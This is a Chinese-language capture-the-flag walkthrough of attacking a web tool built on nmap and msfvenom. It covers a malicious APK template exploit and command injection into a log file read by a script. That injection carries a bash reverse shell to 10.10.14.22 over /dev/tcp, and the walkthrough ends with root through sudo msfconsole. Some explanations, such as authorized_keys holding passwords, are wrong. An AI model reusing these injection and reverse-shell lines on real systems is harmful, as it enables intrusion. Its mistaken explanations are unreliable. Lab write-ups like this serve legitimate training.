信息收集
nmap
5000
端口如下。
测试nmap
。
测试exploit
。
测试sploits
。
尝试绕过,开启与否的url
编码前后一致。
目前没有发现有利用的地方,继续回到payloads
继续测试。
现在payloads
有三个可能存在漏洞的地方。
- windows template file
- linux template file
- apk template file
分别使用搜索引擎。
比较在意其中APK
的一个相关搜索结果。
msf
也找到得到对应的。
看了一下会
随便换了个payload
。
这个负载会生成一个apk文件,并且在payloads进行写入的时候,反手注入写入者一波。但是失败了。
又换了一个payload
。
顺利利用。
开机
提权
有一个.sudo_as_admin_successful
文件,但是是空的,它为什么会出现在这里。
sudo -l
需要kid
的密码,但是目前没有。
在.ssh文件里面找到了authorized_keys
,此文件内一般会有用户密码,但是现在这个文件是空的,并且可以修改,所以可以选择修改文件使用ssh
登录。来到了pwn
用户目录。
有一个脚本,同样能够修改和执行,功能是什么呢。简单地说就是读取/home/kid/logs/hackers
文件内容,并且经过一些处理后使用nmap扫描。
然后此应用是以pwn
身份运行,可以在脚本后面加上一句反弹,就能收到pwn
身份的shell
了,注意这个脚本会一直循环读取hackers
文件。
看来直接添加到scanlosers.sh
文件是不行的所以来仔细看看这个脚本干了什么。
先给log赋一个文件的路径。切换到pwn用户根目录。
然后以' '
为分隔符,留下第2
个' '
以后的所有字符,又以ascii
码排序并去重,最后读取前面一系列操作后的结果作为ip
变量的值。
再看看后面的代码,判断这个hackers
文件行数是否大于0,是的话就给hackers
文件一个不自动换行的参数-n
,简单来说就是就是让hackers
文件为空。
不出意外这样输入就能获得pwn
的shell
,但是我写不进去。
权限上又能写,什么情况呢。
写入前面的authorized_keys
文件看看,这个文件能写入但是hackers为什么不能写入呢。
因为前面提到过authorized_keys
文件会一直不停读取hackers
文件,如果输入后行数大于0
就会被执行脚本后立即清空。所以直接写进去应该就能读取了。
现在来构造一下语句,要通过cut
和sort
,就需要这样构造shell
,;
从左到右无论成功与否都会执行。
127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1"
但是会报错重定向。
会不会是这后面导致重定向错误,反弹语句后面跟上注释符#
试试。
127.0.0.1 12;bash -c "bash -i >& /dev/tcp/10.10.14.22/1234 0>&1" #
切换到pwn
用户后,发现能用sudo运行msf
。
可以看到使用sudo
登陆的msf
拥有root
的权限。
正在sudo
权限下的msf
中反弹即可,也可以直接在msf中建了一个shell,使用bash
应该就可以了。